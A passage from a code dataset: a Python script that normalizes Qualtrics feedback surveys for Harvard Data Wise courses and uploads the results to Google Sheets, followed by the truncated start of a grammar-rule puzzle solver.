reader:\n\t\t\t\tvalues.append(row)\n\n\t\t#print(values)\n\n\t\tsurvey_info = survey_name.split(\"_\")\n\t\t\n\t\tyear = survey_info[0]\n\t\tprogram = survey_info[1]\n\t\tday = ''\n\t\tif len(survey_info) == 2: \n\t\t\tday = 'N/A'\n\t\telse: \n\t\t\tday = survey_info[2]\n\n\t\tprint(program + ' ' + year + ' ' + day)\n\t\t\n\t\tnormalize_crosstab(values, program, year, day)\n\ndef historical():\n\t#download historical files, loop through, normalize, and upload\n\t#Once this is done, then we only need to run main\n\tpath_names = {\n\n\t\t'2018_DWI_Monday': 'DWI18 Monday Feedback Survey.csv',\n\t\t'2018_DWI_Tuesday': 'DWI18 Tuesday Feedback Survey.csv',\n\t\t'2018_DWI_Wednesday': 'DWI18 Wednesday Feedback Survey.csv',\n\t\t'2018_DWI_Thursday': 'DWI18 Thursday Feedback Survey.csv',\n\t\t'2018_DWI_Friday': 'DWI18 Friday Feedback Survey.csv',\n\t\t'2018_DWJ_Monday': 'DWJ18 Monday Feedback Survey.csv',\n\t\t'2018_DWJ_Tuesday': 'DWJ18 Tuesday Feedback Survey.csv',\n\t\t'2018_DWJ_Wednesday': 'DWJ18 Wednesday Feedback Survey.csv',\n\t\t'2018_DWJ_Thursday': 'DWJ18 Thursday Feedback Survey.csv',\n\t\t'2018_DWJ_Friday': 'DWJ18 Friday Feedback Survey.csv',\n\t\t'2016_DWA': 'DWA16 End Feedback Survey.csv',\n\t\t'2017_DWA': 'DWA17 End Feedback Survey.csv',\n\t\t'2018_DWO': 'DWO18 End Feedback Survey.csv'\n\n\t}\n\n\tfor path in path_names:\n\t\tprint(path)\n\n\t\tvalues = []\n\n\t\tsplit = path.split(\"_\")\n\t\tyear = split[0]\n\t\tprogram = split[1]\n\t\tday = 'N/A'\n\t\tif len(split) == 3:\n\t\t\tday = split[2]\n\n\n\t\t'''if program != 'DWO':\n\t\t\tcontinue'''\n\n\t\tpath_to_file = r'Historical/' + path_names[path] + ''\n\n\t\twith open(path_to_file, 'r', newline='',encoding='utf-8') as raw_file:\n\t\t\treader = csv.reader(raw_file)\n\t\t\tfor row in reader:\n\t\t\t\tvalues.append(row)\n\n\t\tnormalize_crosstab(values, program, year, day)\n\t\t\n\t\t\n\n\n\ndef normalize_crosstab(values, program, year, day):\n\n\tquestion_search_dict = {\n\t\t'DWH': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('intellectually challenging'): ['Challenge', \"Today's class and activities were intellectually challenging\"],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"Today's sessions helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('foster equitable practices'): ['Equity2',\"Today's sessions helped me build skills to use Data Wise tools to foster equitable practices at each step of the improvement process\"],\n\t\t\t\tre.compile('team.*norms'): ['Team Norms',\"In the team that you came to Harvard with, how well are you and your colleagues following norms?\"],\n\t\t\t\tre.compile('group.*norms'): ['Group Norms', \"To what extent did your case group practice our Data Wise norms today?\"],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile(\"diversity of.*learning.*community\"): ['Diversity', \"How satisfied were you with the diversity of the course's learning community, inclusive of racial, ethnic, professional, personal, regional, institution type, and other perspectives and backgrounds?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial']\n\t\t\t\t},\n\t\t'DWJ': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('intellectually challenging'): ['Challenge', \"Today's class and activities were intellectually challenging\"],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"Today's sessions helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('take an equity lens'): ['Equity2',\"Today's sessions helped me build skills to take an equity lens at each step of the Data Wise Improvement Process\"],\n\t\t\t\tre.compile('team.*norms'): ['Team Norms',\"In the team that you came to Harvard with, how well are you and your colleagues following norms?\"],\n\t\t\t\tre.compile('group.*norms'): ['Group Norms', \"To what extent did your case group practice our Data Wise norms today?\"],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile(\"diversity of.*learning.*community\"): ['Diversity', \"How satisfied were you with the diversity of the course's learning community, inclusive of racial, ethnic, professional, personal, regional, institution type, and other perspectives and backgrounds?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial'],\n\t\t\t\tre.compile('support from.*staff'): ['Support', 'Please indicate your satisfaction with the support from the program staff']\n\t\t\t\t},\n\t\t'DWI': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('intellectually challenging'): ['Challenge', \"Today's class and activities were intellectually challenging\"],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"Today's sessions helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('integrate equity'): ['Equity2',\"Today's sessions helped me build skills to integrate equity at each step of the improvement process.\"],\n\t\t\t\tre.compile('team.*norms'): ['Team Norms',\"In the team that you came to Harvard with, how well are you and your colleagues following norms?\"],\n\t\t\t\tre.compile('group.*norms'): ['Group Norms', \"To what extent did your case group practice our Data Wise norms today?\"],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile(\"diversity of.*learning.*community\"): ['Diversity', \"How satisfied were you with the diversity of the course's learning community, inclusive of racial, ethnic, professional, personal, regional, institution type, and other perspectives and backgrounds?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial'],\n\t\t\t\tre.compile('support.*staff'): ['Support', 'Please indicate your satisfaction with the support from the program staff']\n\t\t\t\t},\n\t\t\t\t#For components, you'll also need to list the component -- split on \"-\"\n\t\t'DWO': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('intellectually challenging'): ['Challenge', \"Today's class and activities were intellectually challenging\"],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"Today's sessions helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('take an equity lens'): ['Equity2',\"Today's sessions helped me build skills to take an equity lens at each step of the Data Wise Improvement Process\"],\n\t\t\t\tre.compile('teaching fellow actions'): ['TF Feedback', 'Please provide feedback on your teaching fellow'],\n\t\t\t\tre.compile('specific feedback for your Teaching Fellow'): ['TF Qualitative Feedback', 'Please provide feedback on your teaching fellow'],\n\t\t\t\tre.compile('team.*norms'): ['Team Norms',\"In the team that you came to Harvard with, how well are you and your colleagues following norms?\"],\n\t\t\t\tre.compile('group.*norms'): ['Group Norms', \"To what extent did your case group practice our Data Wise norms today?\"],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial'],\n\t\t\t\tre.compile('support.*staff'): ['Support', 'Please indicate your satisfaction with the support from the program staff']\n\t\t\t\t},\n\t\t'DWS': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('intellectually challenging'): ['Challenge', \"Today's class and activities were intellectually challenging\"],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"Today's sessions helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('take an equity lens'): ['Equity2',\"Today's sessions helped me build skills to take an equity lens at each step of the Data Wise Improvement Process\"],\n\t\t\t\tre.compile('teaching fellow actions'): ['TF Feedback', 'Please provide feedback on your teaching fellow'],\n\t\t\t\tre.compile('specific feedback for your Teaching Fellow'): ['TF Qualitative Feedback', 'Please provide feedback on your teaching fellow'],\n\t\t\t\tre.compile('team.*norms'): ['Team Norms',\"In the team that you came to Harvard with, how well are you and your colleagues following norms?\"],\n\t\t\t\tre.compile('group.*norms'): ['Group Norms', \"To what extent did your case group practice our Data Wise norms today?\"],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial'],\n\t\t\t\tre.compile('support.*staff'): ['Support', 'Please indicate your satisfaction with the support from the program staff']\n\t\t\t\t},\n\t\t'DWA': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('components'): ['Components', 'Please rate the extent to which each of the following components helped you to prepare to launch the Data Wise Improvement Process at your site'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial'],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"This program helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('equity lens'): ['Equity2',\"This program helped me build skills to take an equity lens in the Data Wise Improvement Process.\"]\n\t\t\t\t},\n\t\t'DWAU': {re.compile('learning objectives'): ['Objectives', 'Please indicate to what extent these learning objectives were effectively covered during the course'],\n\t\t\t\tre.compile('rate the overall quality'): ['Quality', 'How would you rate the overall quality of this program?'],\n\t\t\t\tre.compile('equity is central'): ['Equity1', \"Today's sessions helped me articulate how and why equity is central to the work of school improvement\"],\n\t\t\t\tre.compile('take an equity lens'): ['Equity2',\"Today's sessions helped me build skills to take an equity lens at each step of the Data Wise Improvement Process\"],\n\t\t\t\tre.compile('team.*norms'): ['Team Norms',\"In the team that you came to Harvard with, how well are you and your colleagues following norms?\"],\n\t\t\t\tre.compile('group.*norms'): ['Group Norms', \"To what extent did your case group practice our Data Wise norms today?\"],\n\t\t\t\tre.compile('professionally useful'): ['Useful', \"To what extent did you find the Data Wise course professionally useful?\"],\n\t\t\t\tre.compile('modify your professional practice'): ['Modify', \"How much do you intend to modify your professional practice, based on your experience in the Data Wise course?\"],\n\t\t\t\tre.compile('scale of 0 to 10'): ['Recommend', 'On a scale of 0 to 10, how likely is it that you would recommend the Data Wise Leadership Institute to a friend or colleague?'],\n\t\t\t\tre.compile('testimonial'): ['Testimonial', 'Please use the space below to share your testimonial'],\n\t\t\t\tre.compile('support.*staff'): ['Support', 'Please indicate your satisfaction with the support from the program staff']\n\t\t\t\t},\n\t\t'DWN': [],\n\n\t}\n\n\tfirstDataCol, role_col, team_col = getDataRoleTeamCols(values)\n\tnumDataCols = len(values[0]) - firstDataCol\n\t\n\traw_headers = values[0]\n\theaders = values[1]\n\n\toverallRows = []\n\tsessionRows = []\n\n\toverallHeader = ['Start Date','End Date','Response Type','IP Address','Progress','Duration (in seconds)','Finished','Recorded Date','Response ID',\n\t\t\t\t'Recipient Last Name','Recipient First Name','Recipient Email','External Data Reference','Location Latitude','Location Longitude','Distribution Channel','User Language']\n\n\tsessionHeader = ['Start Date','End Date','Response Type','IP Address','Progress','Duration (in seconds)','Finished','Recorded Date','Response ID',\n\t\t\t\t'Recipient Last Name','Recipient First Name','Recipient Email','External Data Reference','Location Latitude','Location Longitude','Distribution Channel','User Language']\n \n \t#Should we add a column for 'Question Category'\n \t#e.g. norms, equity, etc\n\toverallHeader.append('Role')\n\toverallHeader.append('Team')\n\toverallHeader.append('Program')\n\toverallHeader.append('Year')\n\toverallHeader.append('Day')\n\toverallHeader.append('Question Number')\n\toverallHeader.append('Question Category')\n\toverallHeader.append('Question Text')\n\toverallHeader.append('Response')\n\toverallHeader.append('Feedback')\n\toverallRows.append(overallHeader)\n\n\tsessionHeader.append('Role')\n\tsessionHeader.append('Team')\n\tsessionHeader.append('Program')\n\tsessionHeader.append('Year')\n\tsessionHeader.append('Day')\n\tsessionHeader.append('Session Type')\n\tsessionHeader.append('Session')\n\tsessionHeader.append('Session Leader')\n\tsessionHeader.append('Question')\n\tsessionHeader.append('Response')\n\tsessionHeader.append('Plus')\n\tsessionHeader.append('Delta')\n\tsessionRows.append(sessionHeader)\n\n\tfor i in range(3, len(values)):\n\t\trow = values[i]\n\n\t\t#Don't want these responses to be collected in our data\n\t\t#if row[2] == 'Survey Preview':\n\t\t#\tcontinue\n\n\t\trole = ''\n\t\tteam = ''\n\t\tif program == 'DWA' or program == 'DWH':\n\t\t\trole = 'Practitioner'\n\t\t\tteam = 'School Team'\n\t\telif program == 'DWO':\n\t\t\tteam = 'School Team'\n\t\t\tif role_col == 0:\n\t\t\t\trole = 'N/A'\n\t\t\telse:\n\t\t\t\trole = row[role_col]\n\t\telse:\n\t\t\tif role_col == 0:\n\t\t\t\trole = 'N/A'\n\t\t\telse:\n\t\t\t\trole = row[role_col]\n\n\t\t\tif team_col == 0:\n\t\t\t\tteam = 'N/A'\n\t\t\telse:\n\t\t\t\tteam = row[team_col]\n\n\t\t#These are the only programs with sessions, so they're the only ones\n\t\t#we want to look for sessions in\n\t\tif program == 'DWJ' or program == 'DWI' or program == 'DWAU' or program == 'DWH' or program == 'DWSB' or program == 'DWO' or program == 'DWA' or program == 'DWS':\n\n\t\t\tcurrent_type = ''\n\t\t\tcurrent_session = ''\n\t\t\tcurrent_leader = ''\n\n\t\t\tschool_team_col = 0\n\n\t\t\tfor datacol in range(numDataCols):\n\n\t\t\t\tnewRow = row[0:firstDataCol]\n\t\t\t\tquestion_number = raw_headers[firstDataCol + datacol]\n\t\t\t\tquestion_text = headers[firstDataCol + datacol].replace('\\n',' ')\n\t\t\t\tresponse = row[firstDataCol + datacol]\n\n\t\t\t\tif response == '' or response == ' ':\n\t\t\t\t\tcontinue\n\n\t\t\t\tif type(response) is str and response.find('\\n') != -1:\n\t\t\t\t\tresponse = response.replace('\\n', ' ')\n\n\n\t\t\t\t#Look for school/team name for Teaching Fellow Feedback\n\t\t\t\t#Set school_team_col so you can always access it\n\t\t\t\ts = re.search('Name of your school/team', question_text)\n\t\t\t\tif s is not None:\n\t\t\t\t\tschool_team_col = datacol\n\n\t\t\t\t#Search for session pattern\n\t\t\t\tm = re.search('\\[([^\\s]+) Session\\]', question_text)\n\t\t\t\t\n\t\t\t\t# CASE 1: A session has been found, deal with it appropriately\n\t\t\t\t# and append the results to the sessionOverall list of rows\n\t\t\t\tif m is not None:\n\n\t\t\t\t\tplus = ''\n\t\t\t\t\tdelta = ''\n\t\t\t\t\tsecond_metric_found = False\n\t\t\t\t\tsecond_question = ''\n\t\t\t\t\tsecond_response = ''\n\t\t\t\t\tnewRow1 = row[0:firstDataCol]\n\n\t\t\t\t\t#Organize first session\n\t\t\t\t\tsplit_string = re.split('[\\[|\\]|\\(|\\)|-]', question_text)\n\t\t\t\t\tsplit_string.pop(0)\n\t\t\t\t\tsession_type = split_string[0].strip()\n\t\t\t\t\tsession = split_string[1].strip()\n\t\t\t\t\tsession_leader = split_string[2].strip()\n\n\t\t\t\t\t#Don't do everything over for the next column\n\t\t\t\t\t#We'll have duplicates and that's BAD\n\t\t\t\t\tif session == current_session and session_leader == current_leader:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tquestion = split_string[-1].strip()\n\t\t\t\t\tsession_response = response.strip()\n\t\t\t\t\tif session_response == '' or session_response == ' ':\n\t\t\t\t\t\tsession_response = 'Blank'\n\n\t\t\t\t\t#Find the second metric, plusses, and deltas in the adjacent three columns\n\t\t\t\t\tfor j in range(datacol+1,datacol+4):\n\t\t\t\t\t\tnext_question_text = headers[firstDataCol + j].replace('\\n','')\n\t\t\t\t\t\tif re.search('\\[([^\\s]+) Session\\]', next_question_text) is not None:\n\t\t\t\t\t\t\tsecond_split = re.split('[\\[|\\]|\\(|\\)|-]', next_question_text)\n\t\t\t\t\t\t\tsecond_split.pop(0)\n\t\t\t\t\t\t\t#If we're looking at a different session then we don't want to do any of this\n\t\t\t\t\t\t\tsecond_question = second_split[-1].strip()\n\t\t\t\t\t\t\tsecond_response = row[firstDataCol + j].replace('\\n',' ').strip()\n\t\t\t\t\t\t\tif second_response == '' or second_response == ' ':\n\t\t\t\t\t\t\t\tsecond_response = 'Blank'\n\t\t\t\t\t\t\tsecond_metric_found = True\n\t\t\t\t\t\telif re.search('What worked well.*about', next_question_text) is not None:\n\t\t\t\t\t\t\t#next_question = 'What worked well about this session?'\n\t\t\t\t\t\t\tplus = row[firstDataCol + j].replace('\\n',' ')\n\t\t\t\t\t\t\tif plus == '' or plus == ' ':\n\t\t\t\t\t\t\t\tplus = 'Blank'\n\t\t\t\t\t\telif re.search('What would you.*change.*about', next_question_text) is not None:\n\t\t\t\t\t\t\t#next_question = 'What would you have liked to change about this session?'\n\t\t\t\t\t\t\tdelta = row[firstDataCol + j].replace('\\n',' ')\n\t\t\t\t\t\t\tif delta == '' or delta == ' ':\n\t\t\t\t\t\t\t\tdelta = 'Blank'\n\t\t\t\t\t\t\t#Deltas are always last so break out of loop after deltas\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tsplit_string = re.split('[\\[|\\]|\\(|\\)|-]', question_text)\n\t\t\t\t\tsplit_string.pop(0)\n\t\t\t\t\tsession_type = split_string[0].strip()\n\t\t\t\t\tsession = split_string[1].strip()\n\t\t\t\t\tsession_leader = split_string[2].strip()\n\n\t\t\t\t\tquestion = split_string[-1].strip()\n\t\t\t\t\tsession_response = response.strip()\n\n\t\t\t\t\t#Add first row\n\t\t\t\t\tnewRow.append(role)\n\t\t\t\t\tnewRow.append(team)\n\t\t\t\t\tnewRow.append(program)\n\t\t\t\t\tnewRow.append(year)\n\t\t\t\t\tnewRow.append(day)\n\t\t\t\t\tnewRow.append(session_type)\n\t\t\t\t\tnewRow.append(session)\n\t\t\t\t\tnewRow.append(session_leader)\n\t\t\t\t\tnewRow.append(question)\n\t\t\t\t\tnewRow.append(session_response)\n\t\t\t\t\tnewRow.append(plus)\n\t\t\t\t\tnewRow.append(delta)\n\t\t\t\t\tsessionRows.append(newRow)\n\t\t\t\t\t#newRow = row[0:firstDataCol]\n\n\t\t\t\t\tif second_metric_found == True:\n\t\t\t\t\t\tnewRow1.append(role)\n\t\t\t\t\t\tnewRow1.append(team)\n\t\t\t\t\t\tnewRow1.append(program)\n\t\t\t\t\t\tnewRow1.append(year)\n\t\t\t\t\t\tnewRow1.append(day)\n\t\t\t\t\t\tnewRow1.append(session_type)\n\t\t\t\t\t\tnewRow1.append(session)\n\t\t\t\t\t\tnewRow1.append(session_leader)\n\t\t\t\t\t\tnewRow1.append(second_question)\n\t\t\t\t\t\tnewRow1.append(second_response)\n\t\t\t\t\t\tnewRow1.append(plus)\n\t\t\t\t\t\tnewRow1.append(delta)\n\t\t\t\t\t\tsessionRows.append(newRow1)\n\n\t\t\t\t\n\t\t\t\t\tcurrent_type = session_type\n\t\t\t\t\tcurrent_session = session\n\t\t\t\t\tcurrent_leader = session_leader\n\n\t\t\t\t\t#Skip the next column so that we don't end up with duplicates\n\n\t\t\t\t#Depending on Program, look to see if question text is a different question that we care about\n\t\t\t\t#Add to overallRows if it is\n\t\t\t\telse:\n\t\t\t\t\t#print(question_text)\n\t\t\t\t\tfor regex in question_search_dict[program]:\n\n\t\t\t\t\t\tm = regex.search(question_text)\n\n\t\t\t\t\t\tif m is not None:\n\t\t\t\t\t\t\tquestion_category = question_search_dict[program][regex][0]\n\t\t\t\t\t\t\tif question_category == 'Recommend':\n\t\t\t\t\t\t\t\tresponse = response.split(' ')[0]\n\t\t\t\t\t\t\tnew_question_text = question_search_dict[program][regex][1]\n\t\t\t\t\t\t\tif question_category in ['Team Norms', 'Group Norms', 'Components', 'Objectives', 'Support', 'TF Feedback']:\n\t\t\t\t\t\t\t\tnew_question_text = question_text.split(\"-\")[-1].strip()\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t#Feedback must be the question immediately after the equity question\n\t\t\t\t\t\t\tfeedback = ''\n\t\t\t\t\t\t\tif question_category == 'Equity1' or question_category == 'Equity2':\n\t\t\t\t\t\t\t\tfeedback = row[firstDataCol + datacol + 1]\n\t\t\t\t\t\t\t\tif feedback == '' or feedback == ' ':\n\t\t\t\t\t\t\t\t\tfeedback = 'Blank'\n\n\n\t\t\t\t\t\t\t#Put feedback in the feedback column and not in the response column\n\t\t\t\t\t\t\tif question_category == 'TF Qualitative Feedback':\n\t\t\t\t\t\t\t\tfeedback = response\n\t\t\t\t\t\t\t\tresponse = ''\n\n\t\t\t\t\t\t\t#Put school/team value in column M if it's a feedback question\n\t\t\t\t\t\t\tif question_category in ['TF Feedback', 'TF Qualitative Feedback']:\n\t\t\t\t\t\t\t\tschool_team = row[firstDataCol + school_team_col]\n\t\t\t\t\t\t\t\tnewRow[12] = school_team\n\n\t\t\t\t\t\t\tnewRow.append(role)\n\t\t\t\t\t\t\tnewRow.append(team)\n\t\t\t\t\t\t\tnewRow.append(program)\n\t\t\t\t\t\t\tnewRow.append(year)\n\t\t\t\t\t\t\tnewRow.append(day)\n\t\t\t\t\t\t\tnewRow.append(question_number)\n\t\t\t\t\t\t\tnewRow.append(question_category)\n\t\t\t\t\t\t\tnewRow.append(new_question_text)\n\t\t\t\t\t\t\tnewRow.append(response)\n\t\t\t\t\t\t\tnewRow.append(feedback)\n\t\t\t\t\t\t\toverallRows.append(newRow)\n\t\t\t\t\t\t\t#we're duplicating info here because the equity questions are part of the objectives\n\t\t\t\t\t\t\t#objectives come first, so if we find them, get out of here!\n\t\t\t\t\t\t\tbreak\n\n\n\t\t#Otherwise we're just looking for overall questions for programs\n\t\telse:\n\n\t\t\tfor datacol in range(numDataCols):\n\t\t\t\tnewRow = row[0:firstDataCol]\n\t\t\t\tquestion_number = raw_headers[firstDataCol + datacol]\n\t\t\t\tquestion_text = headers[firstDataCol + datacol].replace('\\n','')\n\t\t\t\tresponse = row[firstDataCol + datacol]\n\n\t\t\t\tif response == '' or response == ' ':\n\t\t\t\t\tcontinue\n\n\t\t\t\tif type(response) is str and response.find('\\n') != -1:\n\t\t\t\t\tresponse = response.replace('\\n', ' ')\n\t\t\t\t\n\t\t\t\tfor regex in question_search_dict[program]:\n\n\t\t\t\t\tm = regex.search(question_text)\n\n\t\t\t\t\tif m is not None:\n\n\t\t\t\t\t\tquestion_category = question_search_dict[program][regex][0]\n\t\t\t\t\t\tif question_category == 'Recommend':\n\t\t\t\t\t\t\tresponse = response.split(' ')[0]\n\t\t\t\t\t\tnew_question_text = question_search_dict[program][regex][1]\n\t\t\t\t\t\tif question_category in ['Team Norms', 'Group Norms', 'Components', 'Objectives', 'Support']:\n\t\t\t\t\t\t\tnew_question_text = question_text.split(\"-\")[-1].strip()\n\n\t\t\t\t\t\tfeedback = ''\n\t\t\t\t\t\tif question_category == 'Equity1' or question_category == 'Equity2':\n\t\t\t\t\t\t\tfeedback = row[firstDataCol + datacol + 1]\n\t\t\t\t\t\tif feedback == '' or feedback == ' ':\n\t\t\t\t\t\t\tfeedback = 'Blank'\n\n\t\t\t\t\t\tnewRow.append(role)\n\t\t\t\t\t\tnewRow.append(team)\n\t\t\t\t\t\tnewRow.append(program)\n\t\t\t\t\t\tnewRow.append(year)\n\t\t\t\t\t\tnewRow.append(day)\n\t\t\t\t\t\tnewRow.append(question_number)\n\t\t\t\t\t\tnewRow.append(question_category)\n\t\t\t\t\t\tnewRow.append(new_question_text)\n\t\t\t\t\t\tnewRow.append(response)\n\t\t\t\t\t\tnewRow.append(feedback)\n\t\t\t\t\t\toverallRows.append(newRow)\n\n\t\t#break\n\t\n\t'''with open('test/output.csv', 'w') as outfile:\n\t\twriter = csv.writer(outfile)\n\t\twriter.writerows(sessionRows)'''\n\n\n\tappendToSheets(sessionRows, overallRows)\n\n\ndef getDataRoleTeamCols(values):\n\t#get data cols\n\tfirstDataCol = 0\n\t#regex = re.compile('Q[0-9]')\n\tfor i in range(len(values[0])):\n\t\tcolumn = values[0][i]\n\t\tm = column.find('UserLanguage')\n\t\tif m != -1:\n\t\t\tfirstDataCol = i + 1\n\t\t\tbreak\n\n\trole_col = 0\n\t#regex2 = re.compile('What is your role')\n\tfor i in range(len(values[0])):\n\t\tcolumn = values[1][i]\n\t\tm = column.find('What is your role')\n\t\tif m != -1:\n\t\t\trole_col = i\n\t\t\tbreak\n\n\tteam_col = 0\n\t#regex3 = re.compile('team do you work with')\n\tfor i in range(len(values[0])):\n\t\tcolumn = values[1][i]\n\t\tm = column.find('kind of team')\n\t\tn = column.find('which team')\n\t\tif m != -1 or n != -1:\n\t\t\tteam_col = i\n\t\t\tbreak\n\n\n\treturn firstDataCol, role_col, team_col\n\n\ndef appendToSheets(sessionRows, overallRows):\n\n\tSCOPES = 'https://www.googleapis.com/auth/spreadsheets'\n\n\tstore = file.Storage('token.json')\n\tcreds = store.get()\n\tif not creds or creds.invalid:\n\t\tflow = client.flow_from_clientsecrets('credentials.json', SCOPES)\n\t\tcreds = tools.run_flow(flow, store)\n\tservice = build('sheets', 'v4', http=creds.authorize(Http()))\n\n\t# Call the Sheets API\n\tsession_sheet_ID = '1NJogP8QxFWCiyHemt35EFeKNv02nNrBLTeAUiPCNCCM'\n\t\n\tbody = {\n\t\t'values': sessionRows[1:]\n\t}\n\tresult = service.spreadsheets().values().append(\n\t\tspreadsheetId=session_sheet_ID, range=\"A:AA\",\n\t\tvalueInputOption='USER_ENTERED', body=body).execute()\n\n\tprint('{0} cells appended to sessions data sheet.'.format(result \\\n\t\t\t\t\t\t\t\t\t\t .get('updates') \\\n\t\t\t\t\t\t\t\t\t\t .get('updatedCells')))\n\n\toverall_sheet_ID = '1iG09yvrF112PiJkrT1-r24S5lHEDCWl5iy-NgeNLCcA'\n\t\n\tbody = {\n\t\t'values': overallRows[1:]\n\t}\n\tresult = service.spreadsheets().values().append(\n\t\tspreadsheetId=overall_sheet_ID, range=\"A:Z\",\n\t\tvalueInputOption='USER_ENTERED', body=body).execute()\n\n\tprint('{0} cells appended to overall data sheet.'.format(result \\\n\t\t\t\t\t\t\t\t\t\t .get('updates') \\\n\t\t\t\t\t\t\t\t\t\t .get('updatedCells')))\n\nif __name__ == '__main__':\n\tscript, survey, sid, api_key = argv\n\tmain(survey, sid, api_key)\n\t\n\n\n\n\n\n\n","sub_path":"qualtrics_online.py","file_name":"qualtrics_online.py","file_ext":"py","file_size_in_byte":29797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"384333677","text":"import re\n\nwith open('input') as f:\n rules, messages = f.read().split('\\n\\n')\n\nmessages = messages.splitlines()\nrules = [x.split(':') for x in rules.split('\\n')]\nruledict = {k:v[1:].replace('\"', '') for k,v in rules}\n\nPATTERN = re.compile('\\d+')\ndef find_valid_messages(rule):\n rightadj = 0\n for match in re.finditer(PATTERN, rule):\n if '|' not in ruledict[match[0]]:\n rule = rule[:match.start()+rightadj] + ruledict[match[0]] + rule[match.end()+rightadj:]\n rightadj += len(ruledict[match[0]]) - len(match[0])\n else:\n b1, b2 = ruledict[match[0]].split('|')\n rule1 = rule[:match.start()+rightadj] + b1.strip() + rule[match.end()+rightadj:]\n rule2 = rule[:match.start()+rightadj] + b2.strip() + rule[match.end()+rightadj:]\n yield from find_valid_messages(rule1)\n yield from find_valid_messages(rule2)\n break\n else:\n if rule.replace(' ', '').isalpha():\n yield rule\n else:\n yield from find_valid_messages(rule)\n\nvalid_42 = set()\nvalid_31 = set()\nfor message in find_valid_messages('42'):\n 